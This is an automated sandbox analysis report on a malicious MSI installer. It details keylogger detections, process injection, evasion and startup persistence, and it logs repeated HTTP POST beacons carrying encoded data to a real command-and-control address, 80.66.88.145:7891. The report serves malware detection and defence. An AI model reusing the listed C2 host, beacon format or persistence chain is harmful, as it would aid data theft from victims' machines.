Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
15e7232gfN.msi

Overview

General Information

Sample Name:15e7232gfN.msi
Original Sample Name:6e068b9dcd8df03fd6456faeb4293c036b91a130a18f86a945c8964a576c1c70.msi
Analysis ID:1280109
MD5:247a8cc39384e93d258360a11381000f
SHA1:23893f035f8564dfea5030b9fdd54120d96072bb
SHA256:6e068b9dcd8df03fd6456faeb4293c036b91a130a18f86a945c8964a576c1c70
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Connects to many ports of the same IP (likely port scanning)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses known network protocols on non-standard ports
Creates a thread in another existing process (thread injection)
Queries the volume information (name, serial number etc) of a device
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
AV process strings found (often used to terminate AV products)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Uses cacls to modify the permissions of files
Drops PE files to the windows directory (C:\Windows)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Creates a start menu entry (Start Menu\Programs\Startup)
Yara detected Keylogger Generic
Checks for available system drives (often done to infect USB drives)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 7028 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\15e7232gfN.msi" MD5: 4767B71A318E201188A0D0A420C8B608)
  • msiexec.exe (PID: 4764 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)
    • msiexec.exe (PID: 7100 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding D8DD1A2B41DAA758FA08D3E85077DC6F MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
      • icacls.exe (PID: 7068 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)HIGH MD5: FF0D1D4317A44C951240FAE75075D501)
        • conhost.exe (PID: 1236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • expand.exe (PID: 5484 cmdline: "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files MD5: 8F8C20238C1194A428021AC62257436D)
        • conhost.exe (PID: 6052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • Autoit3.exe (PID: 4108 cmdline: "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe" UGtZgHHT.au3 MD5: C56B5F0201A3B3DE53E561FE76912BFD)
        • cmd.exe (PID: 4696 cmdline: cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • OLicenseHeartbeat.exe (PID: 3132 cmdline: C:\Program Files (x86)\common files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe MD5: CFD37109A4E595C2957C5E0ACC198E8A)
      • icacls.exe (PID: 6980 cmdline: "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\." /SETINTEGRITYLEVEL (CI)(OI)LOW MD5: FF0D1D4317A44C951240FAE75075D501)
        • conhost.exe (PID: 4952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Autoit3.exe (PID: 7204 cmdline: "C:\ProgramData\fkeabad\Autoit3.exe" C:\ProgramData\fkeabad\efghhgd.au3 MD5: C56B5F0201A3B3DE53E561FE76912BFD)
    • cmd.exe (PID: 7404 cmdline: cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • ADelRCP.exe (PID: 8100 cmdline: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe MD5: 408995FA63F7BA3E059C8E32356B86C4)
      • SciTE.exe (PID: 7396 cmdline: C:\Program Files (x86)\autoit3\SciTE\SciTE.exe MD5: 91EE39F4A80F60A938095424EEF2C709)
        • msinfo32.exe (PID: 5644 cmdline: C:\Program Files (x86)\common files\microsoft shared\MSInfo\msinfo32.exe MD5: 29F917BF3DE95D7CE5B6B38CB7A895AB)
      • MyProg.exe (PID: 8056 cmdline: C:\Program Files (x86)\autoit3\Examples\Helpfile\Extras\MyProg.exe MD5: FE48113F3A78F980634E8CDACABF5091)
  • ADelRCP.exe (PID: 8016 cmdline: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe MD5: 408995FA63F7BA3E059C8E32356B86C4)
  • ADelRCP.exe (PID: 8024 cmdline: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe MD5: 408995FA63F7BA3E059C8E32356B86C4)
  • ADelRCP.exe (PID: 8032 cmdline: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe MD5: 408995FA63F7BA3E059C8E32356B86C4)
  • ADelRCP.exe (PID: 8040 cmdline: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe MD5: 408995FA63F7BA3E059C8E32356B86C4)
  • ADelRCP.exe (PID: 8048 cmdline: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe MD5: 408995FA63F7BA3E059C8E32356B86C4)
  • ADelRCP.exe (PID: 8064 cmdline: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe MD5: 408995FA63F7BA3E059C8E32356B86C4)
  • ADelRCP.exe (PID: 8072 cmdline: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe MD5: 408995FA63F7BA3E059C8E32356B86C4)
  • ADelRCP.exe (PID: 8080 cmdline: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\ADelRCP.exe MD5: 408995FA63F7BA3E059C8E32356B86C4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: Autoit3.exe PID: 4108JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    Process Memory Space: cmd.exe PID: 4696JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      Process Memory Space: Autoit3.exe PID: 7204JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        Process Memory Space: cmd.exe PID: 7404JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          Process Memory Space: SciTE.exe PID: 7396JoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for domain / URL
            Source: http://80.66.88.145:7891/Virustotal: Detection: 5%Perma Link
            Source: http://80.66.88.145Virustotal: Detection: 6%Perma Link
            Source: Binary string: wntdll.pdbUGP source: Autoit3.exe, 00000008.00000003.560148976.00000000040A4000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.559476358.00000000041B6000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567350269.000000000422C000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565109229.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.0000000005110000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.591225500.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.599283405.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.595824245.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.708417301.0000000005060000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.819052364.0000000008560000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685301980.00000000083D0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Autoit3.exe, 00000008.00000003.560148976.00000000040A4000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.559476358.00000000041B6000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567350269.000000000422C000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565109229.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.0000000005110000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.591225500.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.599283405.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.595824245.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.708417301.0000000005060000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.819052364.0000000008560000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685301980.00000000083D0000.00000004.00001000.00020000.00000000.sdmp
            Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeFile opened: c:Jump to behavior
            Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_004089B0 FindFirstFileA,9_2_004089B0
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00408AB8 FindFirstFileA,9_2_00408AB8
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroApp\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exeFile opened: C:\Program Files (x86)\adobe\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Esl\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\Jump to behavior

            Networking

            barindex
            Connects to many ports of the same IP (likely port scanning)
            Source: global trafficTCP traffic: 80.66.88.145 ports 7891,1,7,8,9,9999
            Uses known network protocols on non-standard ports
            Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49690
            Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49692
            Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49696
            Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49697
            Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49702
            Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49703
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49745
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49752
            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49756
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49763
            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49767
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 7891
            Source: unknownNetwork traffic detected: HTTP traffic on port 7891 -> 49770
            Source: Joe Sandbox ViewASN Name: RISS-ASRU RISS-ASRU
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 658Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 61 45 79 6c 63 45 37 6c 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 4a 63 45 4f 72 63 25 32 42 4f 6c 61 44 79 6c 63 45 37 43 63 45 4f 72 62 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 34 63 45 4f 6c 61 6f 33 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 61 44 35 6c 63 45 33 72 63 45 4f 72 62 6f 4f 6c 61 44 6b 6c 63 45 37 34 63 45 4f 34 63 45 4f 6c 61 25 32 42 4d 6c 63 45 59 72 63 45 4f 38 61 45 4f 6c 63 44 4f 6c 63 45 78 36 63 45 4f 68 62 45 4f 6c 61 25 32 42 78 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 61 48 6b 6c 63 45 33 58 63 45 4f 72 58 25 32 42 4f 6c 63 44 4f 6c 63 45 6b 6c 63 45 4f 72 63 6f 4f 6c 61 44 59 6c 63 45 66 6d 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 34 63 45 4f 6c 63 48 78 6c 63 45 53 6c 63 45 4f 36 61 6f 4f 6c 61 4b 6b 6c 63 45 6b 34 63 45 4f 43 61 6f 4f 6c 61 45 37 6c 63 45 78 4a 63 45 4f 36 63 25 32 42 4f 6c 61 6f 78 6c 63 45 78 36 63 45 4f 36 63 44 4f 6c 61 45 6b 6c 63 45 78 43 63 45 4f 34 63 45 4f 6c 63 48 78 6c 63 45 53 6c 63 45 4f 36 61 25 32 42 4f 6c 61 25 32 42 53 6c 63 45 33 58 63 45 4f 68 63 45 4f 6c 61 25 32 42 4f 6c 63 45 33 36 63 45 4f 72 61 45 4f 6c 63 44 4f 6c 63 45 37 36 63 45 4f 68 63 25 32 42 4f 6c 61 44 35 6c 63 45 66 50 63 45 4f 72 61 25 32 42 4f 6c 63 44 4f 6c 63 45 41 65 63 45 4f 36 63 25 32 42 4f 6c 61 45 35 6c 63 45 53 6c 63 45 4f 36 61 25 32 42 4f 6c 61 25 32 42 53 6c 63 45 33 58 63 45 4f 68 63 45 4f 6c 61 25 32 42 4f 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 63 44 4f 6c 63 45 33 72 63 45 4f 68 63 44 4f 6c 61 48 33 6c 63 45 66 65 63 45 4f 34 63 45 4f 6c 61 25 32 42 37 6c 63 45 37 68 63 45 4f 68 61 25 32 42 4f 6c 63 48 6b 6c 63 45 33 36 63 45 4f 68 62 45 4f 6c 61 44 6b 6c 63 45 66 65 63 45 4f 68 63 25 32 42 4f 6c 61 44 35 6c 63 45 47 50 63 45 4f 72 63 25 32 42 4f 6c 61 48 33 6c 63 45 66 65 63 45 52 5a 63 66 68 43 25 32 42 44 66 5a 68 53 30 38 6e 7a 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=aEylcE7lcEOhcEOlaHYlcE3JcEOrc%2BOlaDylcE7CcEOrboOlaH3lcEfPcEO4cEOlao3lcE36cEOhcDOlaD5lcE3rcEOrboOlaDklcE74cEO4cEOla%2BMlcEYrcEO8aEOlcDOlcEx6cEOhbEOla%2BxlcE36cEOhcDOlaHklcE3XcEOrX%2BOlcDOlcEklcEOrcoOlaDYlcEfmcEOrcoOlaD7lcE36cEO4cEOlcHxlcESlcEO6aoOlaKklcEk4cEOCaoOlaE7lcExJcEO6c%2BOlaoxlcEx6cEO6cDOlaEklcExCcEO4cEOlcHxlcESlcEO6a%2BOla%2BSlcE3XcEOhcEOla%2BOlcE36cEOraEOlcDOlcE76cEOhc%2BOlaD5lcEfPcEOra%2BOlcDOlcEAecEO6c%2BOlaE5lcESlcEO6a%2BOla%2BSlcE3XcEOhcEOla%2BOlcE36cEOhcDOlcDOlcE3rcEOhcDOlaH3lcEfecEO4cEOla%2B7lcE7hcEOha%2BOlcHklcE36cEOhbEOlaDklcEfecEOhc%2BOlaD5lcEGPcEOrc%2BOlaH3lcEfecERZcfhC%2BDfZhS08nz&act=1000
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 1054Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 63 6f 4f 38 63 77 68 72 58 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 72 61 6f 4f 6c 61 25 32 42 59 6c 63 66 68 43 61 44 4d 38 63 44 30 5a 61 45 79 6c 63 45 37 6c 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 4a 63 45 4f 72 63 25 32 42 4f 6c 61 44 79 6c 63 45 37 43 63 45 4f 72 62 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 34 63 45 4f 6c 61 6f 33 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 61 44 35 6c 63 45 33 72 63 45 4f 72 62 6f 4f 6c 61 44 6b 6c 63 45 37 34 63 45 4f 34 63 45 4f 6c 61 25 32 42 4d 6c 63 45 59 72 63 45 4f 38 61 45 4f 6c 63 44 4f 6c 63 45 78 36 63 45 4f 68 62 45 4f 6c 61 25 32 42 78 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 61 48 6b 6c 63 45 33 58 63 45 4f 72 58 25 32 42 4f 6c 63 44 4f 6c 63 45 6b 6c 63 45 4f 72 63 6f 4f 6c 61 44 59 6c 63 45 66 6d 63 45 4f 72 63 6f 4f 6c 61 44 37 6c 63 45 33 36 63 45 4f 34 63 45 4f 6c 63 48 78 6c 63 45 53 6c 63 45 4f 36 61 6f 4f 6c 61 4b 6b 6c 63 45 6b 34 63 45 4f 43 61 6f 4f 6c 61 45 37 6c 63 45 78 4a 63 45 4f 36 63 25 32 42 4f 6c 61 6f 78 6c 63 45 78 36 63 45 4f 36 63 44 4f 6c 61 45 6b 6c 63 45 78 43 63 45 4f 34 63 45 4f 6c 63 48 78 6c 63 45 53 6c 63 45 4f 36 61 25 32 42 4f 6c 61 25 32 42 53 6c 63 45 33 58 63 45 4f 68 63 45 4f 6c 61 25 32 42 4f 6c 63 45 33 36 63 45 4f 72 61 45 4f 6c 63 44 4f 6c 63 45 37 36 63 45 4f 68 63 25 32 42 4f 6c 61 44 35 6c 63 45 66 50 63 45 4f 72 61 25 32 42 4f 6c 63 44 4f 6c 63 45 41 65 63 45 4f 36 63 25 32 42 4f 6c 61 45 35 6c 63 45 53 6c 63 45 4f 36 61 25 32 42 4f 6c 61 25 32 42 53 6c 63 45 33 58 63 45 4f 68 63 45 4f 6c 61 25 32 42 4f 6c 63 45 33 36 63 45 4f 68 63 44 4f 6c 63 44 4f 6c 63 45 33 72 63 45 4f 68 63 44 4f 6c 61 48 33 6c 63 45 66 65 63 45 4f 34 63 45 4f 6c 61 25 32 42 37 6c 63 45 37 68 63 45 4f 68 61 25 32 42 4f 6c 63 48 6b 6c 63 45 33 36 63 45 4f 68 62 45 4f 6c 61 44 6b 6c 63 45 66 65 63 45 4f 68 63 25 32 42 4f 6c 61 44 35 6c 63 45 47 50 63 45 4f 72 63 25 32 42 4f 6c 61 48 33 6c 63 45 66 65 63 45 52 5a 63 66 72 56 44 6e 41 46 44 37 74 30 25 33 44 59 52 79 44 77 47 46 25 33 44 51 41 39 25 33 44 6f 53 64 58 61 52 4c 54 45 33 72 63 45 4f 64 58 37 4f 34 25 32 42 44 78 6c 54 4b 45 70 76 42 52 32 54 45 78 64 58 62 44 34 6a 47 6f 5a 61 4b 78 6c 63 45 33 4a 63 45 4f 72 63 25 32 42 4f 6c 61 25 32 42 53 6c 63 45 66 52 63 45 4f 68 63 25 32 42 4f 6c 61 48 33 6c 63 45 33 72 63 45 4f 68 61 45 4f 6c 63 44 4f 6c 63 45 78 34 63 45 4f 72 63 6f 4f 6c 61 25 32 42 59 6c 63 45 33 4a 63 45 4f 72 63 25 32 42 4f 6c 63 44 4f 6c 63 45 78 43 63 45 4f 72 62 6f 4f 6c 61 25 32 42 59 6c 63 45 37 6c 63 45 4f 72 58 25 32 42 4f 6c 61 44 79 6c 63 45 37 4a 63 45 4f 34 63 45 4f 6c 61 45 79 6c 63 45 33 43 63 45 4f 72 63 6f 4f 6c 61 25 32 42 4f 6c 63 45 37 43 63 45 4f 72 61 6f 4f
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 81Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 61 6f 53 6c 63 45 37 36 63 45 4f 72 6c 6f 4f 6c 6e 45 52 5a 61 37 76 72 6e 51 49 46 48 77 43 26 61 63 74 3d 31 30 30 30 Data Ascii: id=KGbCHChEAfdDHKHhdFBfChfKbcGaBEGC&data=aoSlcE76cEOrloOlnERZa7vrnQIFHwC&act=1000
            Source: global trafficHTTP traffic detected: POST / HTTP/1.0Host: 80.66.88.145:7891Keep-Alive: 300Connection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; Synapse)Content-Type: application/x-www-form-urlencodedContent-Length: 460Data Raw: 69 64 3d 4b 47 62 43 48 43 68 45 41 66 64 44 48 4b 48 68 64 46 42 66 43 68 66 4b 62 63 47 61 42 45 47 43 26 64 61 74 61 3d 63 6f 4f 38 63 77 68 72 58 6f 4f 6c 61 48 33 6c 63 45 66 50 63 45 4f 72 61 6f 4f 6c 61 25 32 42 59 6c 63 66 68 43 61 44 4d 38 63 44 30 5a 61 6f 53 6c 63 45 37 36 63 45 4f 72 6c 6f 4f 6c 6e 45 52 5a 38 53 6e 43 6a 53 68 71 36 42 35 64 58 62 44 34 6a 59 74 7a 34 59 35 34 54 4b 6f 75 43 59 4f 72 61 44 4f 6c 54 4b 4f 64 63 42 76 43 63 37 52 4f 38 66 62 64 58 37 4f 43 54 4b 6f 62 48 76 30 38 6e 45 41 65 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 37 34 63 45 4f 72 6c 44 4f 6c 61 25 32 42 59 6c 63 45 66 52 63 45 4f 72 61 44 4f 6c 61 25 32 42 78 6c 63 45 53 6c 63 45 4f 43 63 44 4f 6c 61 44 79 6c 63 45 37 38 63 45 4f 72 62 6f 4f 6c 61 44 59 6c 63 45 53 6c 63 45 4f 43 61 45 4f 6c 61 44 35 6c 63 45 37 38 63 45 4f 68 63 45 4f 6c 61 48 59 6c 63 45 33 58 63 45 4f 68 62 6f 4f 6c 63 44 4f 6c 63 45 78 58 63 45 4f 72 61 45 4f 6c 61 44 79 6c 63 45 37 6c 63 45 4f 68 61 45 4f 6c 61 44 6b 6c 63 45 37 34 63 45 52 5a 62 45 79 4a 63 59 52 39 58 6e 72 78 42 53 6e 4e 44 77 45 38 54 45 79 6c 54 51 52 34 44 25 33 44 4f 64 76 45 33 43 54 4b 47 36 42 53 72 4e 54 45 79 68 63 6f 59 43 6e 51 49 46 48 77 72 5a 63 6f 33 4a 63 45 59 6a 63 45 4f 72 63 6e 72 4c 44 76 25 32 42 77 44 77 45 77 6e 45 78 77 61 6e 68 6c 6e 45 52 5a 61 25 32 42 4d 4a 63 65 26 61 63 74 3d 31 30 30 31 Data Ascii: 